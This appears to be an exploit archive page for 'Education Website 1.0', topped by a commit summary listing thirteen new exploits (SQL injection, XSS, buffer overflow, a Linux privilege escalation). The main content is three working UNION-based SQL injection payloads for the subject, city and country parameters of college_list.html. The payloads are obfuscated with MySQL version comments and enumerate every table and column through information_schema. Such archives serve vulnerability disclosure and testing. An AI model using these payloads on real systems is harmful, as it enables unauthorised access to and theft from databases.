716ece3cc6
13 changes to exploits/shellcodes Snes9K 0.0.9z - Denial of Service (PoC) Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH) Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation H2 Database 1.4.196 - Remote Code Execution ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting Fork CMS 5.4.0 - Cross-Site Scripting Hotel Booking Engine 1.0 - 'h_room_type' SQL Injection Education Website 1.0 - 'subject' SQL Injection Singleleg MLM Software 1.0 - 'msg_id' SQL Injection Binary MLM Software 1.0 - 'pid' SQL Injection Flippa Marketplace Clone 1.0 - 'date_started' SQL Injection WUZHICMS 2.0 - Cross-Site Scripting Billion ADSL Router 400G 20151105641 - Cross-Site Scripting
23 lines
No EOL
2.9 KiB
Text
23 lines
No EOL
2.9 KiB
Text
# Exploit Title: Education Website 1.0 - 'subject' SQL Injection
|
|
# Dork: N/A
|
|
# Date: 2018-10-01
|
|
# Exploit Author: Ihsan Sencan
|
|
# Vendor Homepage: http://scriptzee.com/
|
|
# Software Link: http://scriptzee.com/products/details/34
|
|
# Version: 1.0
|
|
# Category: Webapps
|
|
# Tested on: WiN7_x64/KaLiLinuX_x64
|
|
# CVE: N/A
|
|
|
|
# POC:
|
|
# http://localhost/[PATH]/college_list.html?subject=[SQL]
|
|
|
|
-7'+/*!11111UNION*/(/*!11111SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(Select+export_set(5,@:=0,(select+count(*)/*!11111from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+-
|
|
|
|
# http://localhost/[PATH]/college_list.html?city=[SQL]
|
|
|
|
'+/*!44444UNION*/(/*!44444SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(Select+export_set(5,@:=0,(select+count(*)/*!44444from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+-
|
|
|
|
# http://localhost/[PATH]/college_list.html?country=[SQL]
|
|
|
|
'+/*!22222UNION*/(/*!22222SELECT*/0x283129%2c0x283229%2c0x283329%2c0x283429%2c0x283529%2c0x283629%2c(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))%2c0x283829%2c0x283929%2c0x28313029%2c0x28313129%2c0x28313229%2c0x28313329%2c0x28313429%2c0x28313529%2c0x28313629%2c0x28313729%2c0x28313829%2c0x28313929%2c0x28323029%2c0x28323129%2c0x28323229%2c0x28323329%2c0x28323429%2c0x28323529%2c0x28323629%2c0x28323729%2c0x28323829%2c0x28323929%2c0x28333029%2c0x28333129%2c0x28333229%2c0x28333329%2c0x28333429%2c0x28333529%2c0x28333629%2c0x28333729%2c0x28333829%2c0x28333929%2c0x28343029%2c0x28343129%2c0x28343229%2c0x28343329%2c0x28343429%2c0x28343529%2c0x28343629%2c0x28343729%2c0x28343829%2c0x28343929%2c0x28353029)--+- |